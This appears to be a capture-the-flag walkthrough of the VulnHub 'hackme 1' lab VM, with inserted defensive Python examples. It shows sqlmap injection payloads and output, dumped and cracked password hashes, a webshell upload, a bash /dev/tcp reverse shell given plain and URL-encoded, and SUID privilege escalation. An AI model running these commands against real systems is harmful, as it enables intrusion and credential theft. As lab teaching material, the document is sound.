
Walkthrough-hackme 1

Published: 2023-06-05 13:56:41, views: 48

0x01 Environment

Target VM:
https://www.vulnhub.com/entry/hackme-1,330/

0x02 Procedure

1. Information gathering

┌──(root㉿kali)-[/home/kali]
└─# netdiscover -r 192.168.60.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                             
                                                                                                                           
 12 Captured ARP Req/Rep packets, from 11 hosts.   Total size: 720                                                         
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.60.82   00:0c:29:58:40:86      1      60  VMware, Inc.                                                            

Discovered IP: 192.168.60.82

Open ports

┌──(root㉿kali)-[/home/kali]
└─# nmap --min-rate 10000 -p- 192.168.60.82                
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 04:57 EDT
Nmap scan report for hackme (192.168.60.82)
Host is up (0.00052s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:58:40:86 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.48 seconds

2. Approach

Opening port 80 shows a site that allows user registration.

Register an arbitrary account and log in; the site has a book search feature, and its search parameter turns out to be SQL-injectable.
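As an added illustration (not part of the original write-up), the vulnerable pattern behind this finding beside its fix: an in-memory SQLite stand-in for the webapphacking database (the books column names are assumed; the page only shows that the search returns 3 columns), with sqlmap's UNION payload rewritten using SQLite's `||` operator in place of MySQL `CONCAT()`.

```python
import sqlite3

# Constructed stand-in for the webapphacking database: a books table (column
# names assumed) and the one users row sqlmap could not crack.
SCHEMA = """
CREATE TABLE books (id INTEGER, title TEXT, author TEXT);
INSERT INTO books VALUES (1, 'CISSP All-in-One', 'Harris');
INSERT INTO books VALUES (2, 'Web Application Hacking', 'Stuttard');
CREATE TABLE users (id INTEGER, name TEXT, user TEXT, address TEXT, pasword TEXT);
INSERT INTO users VALUES (11, 'superadmin', 'superadmin', 'superadmin',
                          '2386acb2cf356944177746fc92523983');
"""

# sqlmap's UNION payload from the page, with SQLite's || standing in for MySQL
# CONCAT(); the trailing "-- -" comments out the rest of the original query,
# which is why the attacker needs to match the column count (3) but nothing else.
PAYLOAD = "cissp' UNION ALL SELECT NULL,NULL,user||':'||pasword FROM users-- -"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn, term):
    """The pattern behind the finding: user input spliced into the SQL text."""
    sql = "SELECT id, title, author FROM books WHERE title LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn, term):
    """Same query with a bound parameter: the payload is only ever a search term."""
    sql = "SELECT id, title, author FROM books WHERE title LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()
```

Run against the vulnerable version the payload returns a row built from the users table; the parameterized version returns nothing for the same input and identical results for a normal search.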

sqlmap dumps the usernames and password hashes:

┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# sqlmap -r 1 --batch --dbs
        ___
       __H__                                                                                                                 
 ___ ___[']_____ ___ ___  {1.7.2#stable}                                                                                     
|_ -| . [,]     | .'| . |                                                                                                    
|___|_  [.]_|_|_|__,|  _|                                                                                                    
      |_|V...       |_|   https://sqlmap.org                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:16:21 /2023-06-05/

[01:16:21] [INFO] parsing HTTP request from '1'
[01:16:21] [INFO] testing connection to the target URL
[01:16:21] [INFO] checking if the target is protected by some kind of WAF/IPS
[01:16:21] [INFO] testing if the target URL content is stable
[01:16:22] [INFO] target URL content is stable
[01:16:22] [INFO] testing if POST parameter 'search' is dynamic
[01:16:22] [INFO] POST parameter 'search' appears to be dynamic
[01:16:22] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[01:16:22] [INFO] testing for SQL injection on POST parameter 'search'
[01:16:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:16:22] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[01:16:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[01:16:22] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:16:22] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[01:16:22] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:16:22] [INFO] testing 'Generic inline queries'
[01:16:22] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[01:16:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[01:16:22] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[01:16:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[01:16:32] [INFO] POST parameter 'search' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[01:16:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:16:32] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[01:16:32] [INFO] target URL appears to be UNION injectable with 3 columns
[01:16:32] [INFO] POST parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 73 HTTP(s) requests:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=cissp' AND (SELECT 6670 FROM (SELECT(SLEEP(5)))dQSX) AND 'YClZ'='YClZ

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=cissp' UNION ALL SELECT NULL,NULL,CONCAT(0x7171707a71,0x71457a72417551616b4f6a6a546744644658514651734a474a564f79466f72536550434e4f697068,0x717a6a7671)-- -
---
[01:16:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.10 (cosmic)
web application technology: Apache 2.4.34
back-end DBMS: MySQL >= 5.0.12
[01:16:32] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] webapphacking

[01:16:32] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.60.82'

[*] ending @ 01:16:32 /2023-06-05/

                                                                                                                             
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# sqlmap -r 1 --batch -D webapphacking --tables             
        ___
       __H__                                                                                                                 
 ___ ___[.]_____ ___ ___  {1.7.2#stable}                                                                                     
|_ -| . ["]     | .'| . |                                                                                                    
|___|_  ["]_|_|_|__,|  _|                                                                                                    
      |_|V...       |_|   https://sqlmap.org                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:16:49 /2023-06-05/

[01:16:49] [INFO] parsing HTTP request from '1'
[01:16:49] [INFO] resuming back-end DBMS 'mysql' 
[01:16:49] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=cissp' AND (SELECT 6670 FROM (SELECT(SLEEP(5)))dQSX) AND 'YClZ'='YClZ

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=cissp' UNION ALL SELECT NULL,NULL,CONCAT(0x7171707a71,0x71457a72417551616b4f6a6a546744644658514651734a474a564f79466f72536550434e4f697068,0x717a6a7671)-- -
---
[01:16:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.10 (cosmic)
web application technology: Apache 2.4.34
back-end DBMS: MySQL >= 5.0.12
[01:16:49] [INFO] fetching tables for database: 'webapphacking'
Database: webapphacking
[2 tables]
+-------+
| books |
| users |
+-------+

[01:16:49] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.60.82'

[*] ending @ 01:16:49 /2023-06-05/

                                                                                                                             
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# sqlmap -r 1 --batch -D webapphacking -T users --dump
        ___
       __H__                                                                                                                 
 ___ ___[']_____ ___ ___  {1.7.2#stable}                                                                                     
|_ -| . ["]     | .'| . |                                                                                                    
|___|_  [']_|_|_|__,|  _|                                                                                                    
      |_|V...       |_|   https://sqlmap.org                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:16:58 /2023-06-05/

[01:16:58] [INFO] parsing HTTP request from '1'
[01:16:58] [INFO] resuming back-end DBMS 'mysql' 
[01:16:58] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=cissp' AND (SELECT 6670 FROM (SELECT(SLEEP(5)))dQSX) AND 'YClZ'='YClZ

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=cissp' UNION ALL SELECT NULL,NULL,CONCAT(0x7171707a71,0x71457a72417551616b4f6a6a546744644658514651734a474a564f79466f72536550434e4f697068,0x717a6a7671)-- -
---
[01:16:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.10 (cosmic)
web application technology: Apache 2.4.34
back-end DBMS: MySQL >= 5.0.12
[01:16:58] [INFO] fetching columns for table 'users' in database 'webapphacking'
[01:16:58] [INFO] fetching entries for table 'users' in database 'webapphacking'
[01:16:58] [INFO] recognized possible password hashes in column 'pasword'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[01:16:58] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[01:16:58] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[01:16:58] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[01:16:58] [INFO] starting 4 processes 
[01:16:59] [INFO] cracked password '123456' for hash 'e10adc3949ba59abbe56e057f20f883e'                                     
[01:17:00] [INFO] cracked password 'commando' for hash '6269c4f71a55b24bad0f0267d9be5508'                                   
[01:17:00] [INFO] cracked password 'hello' for hash '5d41402abc4b2a76b9719d911017c592'                                      
[01:17:01] [INFO] cracked password 'p@ssw0rd' for hash '0f359740bd1cda994f8b55330c86d845'                                   
[01:17:02] [INFO] cracked password 'testtest' for hash '05a671c66aefea124cc08b76ea6d30bb'                                   
Database: webapphacking                                                                                                     
Table: users
[7 entries]
+----+--------------+------------+----------------+---------------------------------------------+
| id | name         | user       | address        | pasword                                     |
+----+--------------+------------+----------------+---------------------------------------------+
| 1  | David        | user1      | Newton Circles | 5d41402abc4b2a76b9719d911017c592 (hello)    |
| 2  | Beckham      | user2      | Kensington     | 6269c4f71a55b24bad0f0267d9be5508 (commando) |
| 3  | anonymous    | user3      | anonymous      | 0f359740bd1cda994f8b55330c86d845 (p@ssw0rd) |
| 10 | testismyname | test       | testaddress    | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| 11 | superadmin   | superadmin | superadmin     | 2386acb2cf356944177746fc92523983            |
| 12 | test1        | test1      | test1          | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| 13 | aa           | bb         | aa             | e10adc3949ba59abbe56e057f20f883e (123456)   |
+----+--------------+------------+----------------+---------------------------------------------+

[01:17:05] [INFO] table 'webapphacking.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.60.82/dump/webapphacking/users.csv'                                                                                                            
[01:17:05] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.60.82'

[*] ending @ 01:17:05 /2023-06-05/

                                  

Submitting the remaining hash to an online lookup site gives:

2386acb2cf356944177746fc92523983
Uncrackable
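An added example (not from the original write-up) of what the dump above tells a defender: the pasword column holds bare MD5 digests, and two different users (test and test1) share one digest, which is only possible without a per-user salt. The block audits a constructed copy of the dumped rows, shows why a short wordlist recovers them, and contrasts a salted PBKDF2 scheme; the wordlist and the storage format string are assumptions.

```python
import hashlib
import hmac
import os
import re
from collections import Counter

# Constructed copy of the (user, pasword) pairs from the users dump above;
# the digests are the ones sqlmap printed.
DUMPED = [
    ("user1", "5d41402abc4b2a76b9719d911017c592"),
    ("user2", "6269c4f71a55b24bad0f0267d9be5508"),
    ("user3", "0f359740bd1cda994f8b55330c86d845"),
    ("test", "05a671c66aefea124cc08b76ea6d30bb"),
    ("superadmin", "2386acb2cf356944177746fc92523983"),
    ("test1", "05a671c66aefea124cc08b76ea6d30bb"),
    ("bb", "e10adc3949ba59abbe56e057f20f883e"),
]
MD5_HEX = re.compile(r"^[0-9a-f]{32}$")


def audit_hashes(rows):
    """Report the two storage weaknesses the dump exposes: values shaped like
    bare MD5 digests, and one digest shared by different users, which cannot
    happen when each password gets its own salt."""
    findings = []
    if all(MD5_HEX.match(h) for _, h in rows):
        findings.append("all values are 32 hex chars, consistent with unsalted MD5")
    for h, n in Counter(h for _, h in rows).items():
        if n > 1:
            users = ", ".join(u for u, v in rows if v == h)
            findings.append("hash %s shared by %s: no per-user salt" % (h, users))
    return findings


def cracked_by_wordlist(rows, wordlist):
    """One MD5 per candidate word serves every user at once; this is why the
    sqlmap dictionary run above finished in seconds."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {u: table[h] for u, h in rows if h in table}


def hash_password(password, iterations=600_000):
    """Replacement scheme (assumed format): PBKDF2-HMAC-SHA256, random 16-byte salt."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password, stored):
    _, iters, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)
```

With the salted scheme, hashing "testtest" for two users yields two different stored values, so a shared password no longer shows up as a shared digest and each guess has to be recomputed per user.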


Log in as superadmin; this account has a file upload feature.

Upload a PHP one-liner webshell.

Reverse shell

bash -c "/bin/sh -i >& /dev/tcp/192.168.60.45/8080 0>&1"
%62%61%73%68%20%2D%63%20%22%2F%62%69%6E%2F%73%68%20%2D%69%20%3E%26%20%2F%64%65%76%2F%74%63%70%2F%31%39%32%2E%31%36%38%2E%36%30%2E%34%35%2F%38%30%38%30%20%30%3E%26%31%22

Catch the reverse shell

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 8080
listening on [any] 8080 ...
connect to [192.168.60.45] from (UNKNOWN) [192.168.60.82] 54692
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
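From the defender's side, an added example (not part of the original write-up) of spotting the step above in Apache access logs: the URL-encoded command is decoded and matched against a few reverse-shell indicators. The log lines are constructed, and the webshell file name (shell.php) and parameter name (cmd) are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed Apache combined-format lines modelled on the walkthrough; the
# second line carries the page's URL-encoded bash command to the uploaded
# webshell (file and parameter names assumed).
ACCESS_LOG = """\
192.168.60.45 - - [05/Jun/2023:01:20:11 -0400] "GET /index.php HTTP/1.1" 200 1532
192.168.60.45 - - [05/Jun/2023:01:20:40 -0400] "GET /uploads/shell.php?cmd=%62%61%73%68%20%2D%63%20%22%2F%62%69%6E%2F%73%68%20%2D%69%20%3E%26%20%2F%64%65%76%2F%74%63%70%2F%31%39%32%2E%31%36%38%2E%36%30%2E%34%35%2F%38%30%38%30%20%30%3E%26%31%22 HTTP/1.1" 200 0
192.168.60.45 - - [05/Jun/2023:01:21:02 -0400] "GET /search.php?q=cissp HTTP/1.1" 200 2210
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators for the kind of command seen on this VM; extend per environment.
SUSPICIOUS = [
    re.compile(r"/dev/tcp/\d+\.\d+\.\d+\.\d+/\d+"),  # bash network redirection
    re.compile(r"\b(?:bash|sh)\s+-i\b"),              # interactive shell spawn
    re.compile(r"\bnc\b.*\s-e\s"),                    # netcat with -e
]


def decode_target(target):
    """Split the request target and percent-decode every query value; the
    second unquote() catches double-encoded payloads."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    return parts.path, {k: [unquote(v) for v in vs] for k, vs in params.items()}


def find_reverse_shell_requests(log_text):
    """Return one record per request whose decoded parameters match an indicator."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, params = decode_target(m.group("target"))
        for name, values in params.items():
            for v in values:
                if any(p.search(v) for p in SUSPICIOUS):
                    hits.append({"ip": m.group("ip"), "path": path,
                                 "param": name, "command": v})
    return hits
```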

Privilege escalation

$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@hackme:/var/www/html/uploads$ find / -user root -perm -4000 -print 2>/dev/null
<s$ find / -user root -perm -4000 -print 2>/dev/null
/snap/core/14946/bin/mount
/snap/core/14946/bin/ping
/snap/core/14946/bin/ping6
/snap/core/14946/bin/su
/snap/core/14946/bin/umount
/snap/core/14946/usr/bin/chfn
/snap/core/14946/usr/bin/chsh
/snap/core/14946/usr/bin/gpasswd
/snap/core/14946/usr/bin/newgrp
/snap/core/14946/usr/bin/passwd
/snap/core/14946/usr/bin/sudo
/snap/core/14946/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/14946/usr/lib/openssh/ssh-keysign
/snap/core/14946/usr/lib/snapd/snap-confine
/snap/core/14946/usr/sbin/pppd
/snap/core22/634/usr/bin/chfn
/snap/core22/634/usr/bin/chsh
/snap/core22/634/usr/bin/gpasswd
/snap/core22/634/usr/bin/mount
/snap/core22/634/usr/bin/newgrp
/snap/core22/634/usr/bin/passwd
/snap/core22/634/usr/bin/su
/snap/core22/634/usr/bin/sudo
/snap/core22/634/usr/bin/umount
/snap/core22/634/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core22/634/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/home/legacy/touchmenot
/bin/mount
/bin/umount
/bin/ping
/bin/ntfs-3g
/bin/su
/bin/fusermount
www-data@hackme:/var/www/html/uploads$ /home/legacy/touchmenot
/home/legacy/touchmenot
root@hackme:/var/www/html/uploads# id
id
uid=0(root) gid=33(www-data) groups=33(www-data)
root@hackme:/var/www/html/uploads# whoami
whoami
root
root@hackme:/var/www/html/uploads# 

The SUID binary /home/legacy/touchmenot stands out from the rest of the list; running it drops straight into a root shell.
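An added example (not from the original write-up) of triaging a `find / -perm -4000` listing the way this step does by eye: setuid binaries under the package- and snap-managed prefixes are expected on an Ubuntu host, and anything elsewhere (home directories, /tmp, /opt, the web root) is what to investigate. The embedded listing is an excerpt of the output above; the prefix baseline is an assumption to tune per build.

```python
import os
import stat

# Constructed excerpt of the find output shown above.
SUID_OUTPUT = """\
/snap/core22/634/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
/usr/bin/pkexec
/usr/bin/passwd
/home/legacy/touchmenot
/bin/mount
/bin/su
"""

# Assumed baseline: locations where distro- or snapd-managed setuid binaries live.
EXPECTED_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
                     "/usr/lib/", "/usr/libexec/", "/snap/")


def triage_suid(listing):
    """Split a setuid listing into expected and anomalous paths.
    The anomalous list is the set a defender should explain or remove."""
    expected, anomalous = [], []
    for line in listing.splitlines():
        path = line.strip()
        if not path:
            continue
        (expected if path.startswith(EXPECTED_PREFIXES) else anomalous).append(path)
    return expected, anomalous


def live_suid_scan(root="/"):
    """Produce the same listing from a real filesystem: regular files owned by
    root with the setuid bit, without following symlinks."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == 0:
                hits.append(p)
    return hits
```

Running `triage_suid(live_suid_scan())` on a host gives the same split the walkthrough made by hand, with /home/legacy/touchmenot as the single anomaly on this VM.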

From: https://www.cnblogs.com/jarwu/p/17452382.html
